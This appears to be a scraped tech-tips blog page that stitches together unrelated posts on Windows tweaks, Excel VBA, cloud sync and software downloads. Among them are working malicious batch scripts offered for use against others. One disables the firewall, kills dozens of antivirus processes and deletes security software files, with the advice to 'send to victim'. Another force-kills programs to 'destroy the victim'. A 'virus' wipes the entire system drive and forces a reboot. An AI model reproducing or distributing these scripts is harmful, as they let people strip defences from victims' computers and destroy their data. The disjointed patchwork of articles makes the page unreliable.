Hackers Types

Hackers Types

Add Comment
Hackers are three types:-
 
1.    White hat hacker
2.    Gray hat hacker 
3.    Black hat hacker

White Hat and Grey Hat Hacker & What is the Real Difference?
 
What is worse, the public is not able to understand terms like grey hat, white hat, Linux OS, or cracker.
However, the truth is that the subculture of the hacker world is more complex than we think. Especially if we consider that, these are very intelligent people.


So, what is ethical hacking white hat and how does it differentiate from grey hackers? The only way to find out is to submerge ourselves in the world of hackers and understand, at least, the most basic concepts. 
Chat with Friends through Command Prompt

Chat with Friends through Command Prompt

Add Comment
1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:


 
7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:
 



8) Now all you need to do is type your message and press Enter.
Start Chatting.......!


DONE....ENJOY.~!!

Virus Types

Add Comment

What is a Computer Virus ?A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user.
How To Disable Victim Antivirus.

How To Disable Victim Antivirus.

Add Comment
Open Notepad Copy it and Paste To Notepad

@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

Now Save this code as .bat and send to victim :)


>>Tasks Kill

@echo off

start calc

tskill msnmsgr

tskill firefox

tskill iexplore

tskill LimreWire

tskill explorer

tskill explorer

tskill explorer

tskill explorer

tskill explorer

pause

  save this as .bat file and send and destroy the victim & k!ll Operat!ng systeM!


>>Code type in notepad

@echo off
shutdown -r -f -t 00

>>Form Of Switches

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f
Forces any running applications to shut down.

-r
Reboots the PC. ..!!..!



>>Popping CD Drives


*This will make the CD drives constantly pop out*

Code:-

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop



>> To make your pc talk

Open a text file in notepad and write:

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."

u will hear now what u typed..

this works in xp, vista, win7 also.

enjoy!!!


Virus Writing

Add Comment


IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .

 All Scripts Here Are To Be Copied In Note Pad


>>This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code a .bat file

How to create BarCode in Access 2013

Add Comment

Barcodes including:

Code 128
Code 39
Interleaved 2 of 5
UPCa
UPCe
EAN13
EAN8
Codabar 
The tutorial explains how to generate barcodes in MS Access 2013. The tutorial assumes that a database is already created that includes a report generated by a table populated with data.

Extracting a URL from a hyperlink on Excel is easy!

Add Comment

Option 1: If you want to run this operation one time

  1. Open up a new workbook.
  2. Get into VBA (Press Alt+F11)
  3. Insert a new module (Insert > Module)
  4. Copy and Paste the Excel user defined function below
  5. Press F5 and click “Run”
  6. Get out of VBA (Press Alt+Q)
Sub ExtractHL()
Dim HL As Hyperlink
For Each HL In ActiveSheet.Hyperlinks
HL.Range.Offset(0, 1).Value = HL.Address
Next
End Sub
How to transfer and sync files between Dropbox, OneDrive, Google Drive

How to transfer and sync files between Dropbox, OneDrive, Google Drive

Add Comment
Transferring and syncing files between cloud storage accounts is worthwhile. In this tutorial we show how you can transfer files quickly and easily between different accounts and we also reveal how to sync folders across cloud services such as Dropbox, OneDrive and Google Drive.
Note: the method shown below will only fully sync cloud storage services when your host PC is turned on.

Why you should sign up to multiple cloud storage services

If you have read our ‘What’s the best cloud service?’ article, you'll know that the current cloud storage limits and compatibility options vary wildly. As a result, we suggest – if you haven’t already – to download and start using as many different cloud accounts as possible.
Not only will this keep your files backed up to the hills - as they're saved in multiple locations - but you'll have more storage space too. Plus, if you follow the method below, you'll be able to sync folders and have them up to date and readily accessible from any of your cloud services.
Dropbox OneDrive google Drive sync

How to transfer files between Dropbox, OneDrive and Google Drive

Step one
In order to be able to sync your files and folders across multiple cloud services, you first have to download the respective PC programs. To do this, simply go to the websites of DropboxOneDrive or Google Drive and follow the links to download the EXE files.
Step two
Once you've downloaded and installed the programs, cloud storage folders will be automatically created for you in Windows Explorer | Computer | Favourties.
Dropbox OneDrive Google Drive transfer
From here you can simply drag and drop (copy and paste) the content you wish to transfer from one account to another; the services will then auto-sync in the background both to your PC and in the cloud.

How to sync folders between Dropbox, OneDrive and Google Drive

If you'd like to sync files between cloud accounts, there's a free Chrome extension called cloudHQ that can help you.
It's a service that lets you sync up to 50 files between two specific folders in different cloud accounts for free (less than 2GB).
Should that number exceed 50 files in two folders, you'll have to part with your credit card out. Prices start from $9.90 a month.
Using cloudHQ is a fairly straightforward affair of entering your login details, allowing the app access to your cloud services and then selecting the folders you'd like to sync. Find below a step-by-step to ensure you set up your cloud sync properly.
Step one
Go to the cloudHQ app and click on the blue “+ FREE” button located in the top right of the window.
Sync dropbox and Google Drive
Step two
You now need to click on your Chrome browser's new cloudHQ shortcut, which can be found on the far right-hand side of the Bookmarks bar, and follow the link to the configuration page.
Next you'll be presented with a grid full of cloud storage logos - click on the service from which you'd like to being your sync.
Sync Cloud services
Note: for the purpose of this tutorial, Dropbox will be used as the primary share folder.
Step three
i) If you're not already logged into Dropbox, you'll need to click on the yellow “Add Dropbox” button found at the bottom of the page.
ii)If you are logged in, click on the yellow “Select” button.
Synch Google Drive and Dropbox
Step four
Your Dropbox folders will now be presented to you in a file explorer-style window; click on the folder you wish to sync and then press the yellow “Select" button.
Sync Dropbox and OneDrive
Step five
Repeat the process with your desired secondary cloud service and folder that you'd like to sync via cloudHQ.
Once selected, you'll see a page that gives you the option to “Synchronize Continuously” or “Synchronize Once”;select as appropriate and cloudHQ will start work right away.
Sync Google Drive and OneDrive

SOTHINK SWF DECOMPILER 7.2 FULL

Add Comment

Sothink SWF Decompiler – SWF to decipher FLA / FLEX, convert Flash to HTML5. This program is the leading Flash decompiler and Flash to convert HTML5. Convert SWF to FLA, SWF to FLEX . Easily extracts Flash resources like shape, image , and audio (MP3, WAV), video ( flv) , text, sprite , ActionScript , etc. Edits SWF by replacing image / shape / text / sound .

Best Registry Tweaks to Speed Up Your Windows

Add Comment

We here at AskVG always try our best to share useful Registry tweaks and tips to make yourWindows faster and user friendly. We have posted several guides to add extra functionality to Windows as well as to customize Windows UI and built-in features.
How to Create Portable Version of Windows 8 on USB Drive Using “Windows To Go” Feature?

How to Create Portable Version of Windows 8 on USB Drive Using “Windows To Go” Feature?

Add Comment
One of the most impressive and most talked about features introduced in Windows 8 is "Windows To Go". "Windows To Go" is a brand new feature ever introduced in any Windows version which helps users in creating a portable live version of fully functional Windows 8 OS which is known as "Windows To Go Workspace". It saves the portable Windows 8 environment on a USB drive which can be used in any other PC to start Windows 8 immediately.
How to Enable Tools -> Folder Options and Registry Editor in Windows

How to Enable Tools -> Folder Options and Registry Editor in Windows

Add Comment
Many times Windows users face a common problem. The "Folder Options" in "Tools" menu is automatically removed or disabled in Windows Explorer. In fact you can't access it from Control Panel. Also whenever you try to open "Registry Editor", you get a message that its disabled by Administrator.
If you are also facing this problem, then you have come to right place. Follow the simple steps mentioned in this tutorial and your problem will be solved:
How to Change the Login Screen Background on Windows 10

How to Change the Login Screen Background on Windows 10

Add Comment



Windows 10 allows you to change the lock screen background, but the login screen background always features the default Windows 10 background. Use these tweaks and you can set any image or color you want as the background.

This changes the image that appears on the sign-in screen after you leave your lock screen. On Windows 8 and 8.1, this was just a flat-color background. The trick for changing Windows 7’s login screen background no longer works the same way on Windows 10.

Use a Single Color Instead of an Image
Rather than seeing a background image whenever you type your password, you can choose to disable the login screen background and see a single, flat-color background — just as Windows 8 and 8.1 used. This requires a quick registry tweak.

Download our Disable Logon Background Image on Windows 10 registry hack. Double-click the included “Disable Logon Background Image on Windows 10.reg” file to add the tweak to your registry. We’ve also included a .reg file that will undo the change, if you like — just double-click it.

If you’d like to do it yourself, open the Registry Editor and create a DWORD value named “DisableLogonBackgroundImage” under “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System” with the value “00000001”. Delete the value or set it to “00000000” to go back to the default Windows 10 “hero image.”

After you perform the registry hack, the Windows login screen will disiplay a flat-color background behind the login prompt. Just press Windows Key + L to lock your PC and check. You don’t have to reboot.


Change the Color of the Login Screen

You can easily change the color of the login screen. Windows 10 uses the same “accent color” used elsewhere on your desktop. By default, it grabs an accent color from your desktop background.

To change this, visit the Settings app, select Personalization, select Colors, and disable the “Automatically pick an accent color from my background” option. The color you select here will be used on your login screen if you’ve used the above registry hack.


rundll32.exe shell32.dll,Control_RunDLL desk.cpl,Advanced,@Advanced

Not every possible accent color appears here. To choose any color you want, you’ll need to use the old, hidden Control Panel interface for picking a color. To access it, press Windows Key + R, copy-paste the following line into the Run box, and press Enter:

Use the “Show color mixer” option and adjust the values until you’ve found your preferred color. This accent color will be used elsewhere on the desktop interface, too. This is the same hidden interface you can use to set any color for your title bars after enabling colored window title bars on Windows 10.


Set a Custom Login Screen Image

Microsoft doesn’t yet provide an official registry hack or group policy setting for changing the login screen background on Windows 10. However, enterprising Windows tweakers have discovered that the image is part of the Windows.UI.Logon.pri file. Change the image stored inside the PRI file and Windows will use a different background image of your choice.

Warning: This approach uses third-party tools to modify a Windows system file. Continue at your own risk.

You’ll need some sort of third-party script or utility to do this. The best tool we found for this was the Windows 10 Login Image Changer, created by Alphawaves over at the My Digital Life Forums, which worked fine on our test system. You’ll need to register and log into the forum to view the download, but here’s a direct download link to the Windows 10 Login Image Changer. (PFCKrutonium’s Windows 10 Login Background Changer should theoretically work as well, but we ran into permission issues. It may be fixed in the future.)

Launch it and select a background image — for example, the wallpapers built into Windows 10 are stored at C:\Windows\Web\ . You’re free to download other wallpaper images from the web, use your own, or even create a flat-color wallpaper image. This would allow you to set a different flat-color background for your login screen than the one Windows 10 uses on the desktop.



These tweaks were tested on the final release version of Windows 10, build 10240. Microsoft may change the way this works in the future as it updates Windows 10 at a more rapid pace than previous versions of Windows — hopefully by providing more built-in options for adjusting these settings.

How to Convert Numbers into Words in Excel

Add Comment
Convert number into word in Excel you can convert numbers in spell example 1510 One Thousand Five Hundred Ten Only like this. For use this feature we need to create a function this function work in all excel version Microsoft Excel 2003, 2007, 2010, 2013,

UltraISO 9.3 offline installer full version

Add Comment

Along with the large capacity hard disk popularity, people were already used to copying compact discs to CD/DVD image files, generally used is the famous ISO 9660 international standards format, therefore CD/DVD image files are called ISO files.

WinRAR 3.9 offline installer full version

Add Comment

WinRAR is an archiving utility that completely supports RAR and ZIP archives and is able to unpack CAB, ARJ, LZH, TAR, GZ, ACE, UUE, BZ2, JAR, ISO, 7Z, Z archives. It consistently makes smaller archives than the competition, saving disk space and transmission costs.

USBDisk Security 6.5.0.0 Download offline installer full

Add Comment

USB storage is a common source of infection with potentially dangerous content, but a lot of antivirus software can not effectively detect the malicious programs from USB drives. USB Disk Security provides the best protection against any threats when using USB drives. 

How To Install Windows From A Partition Without Any External Media

Add Comment
Hey guys this post is really very useful for not only installing windows but many more system management. As you know to format or installing windows you need an external media like Disc Drive or USB Flash Drive. But now can do it with some simple step without any Disc or Flash Drive.

Requirement :
  •  A Windows CD for first time only(with which you want to format or install your OS)
  • EasyBCD Software(You can download free beta version of it from anywhere)
  • Free Hard Disk space depending upon the size of your installation disc(for example here we gonna show you this process with Windows 7 and 8. Generally the size of a Windows 7-8 installation Disc is about 4 GB. So here we need 5 GB of free space. That's means 1 GB more space than the installation disc)


Method :
  1. Create a partition of about 5 GB. [As you can see in picture (Drive H:)]
    Blank Drive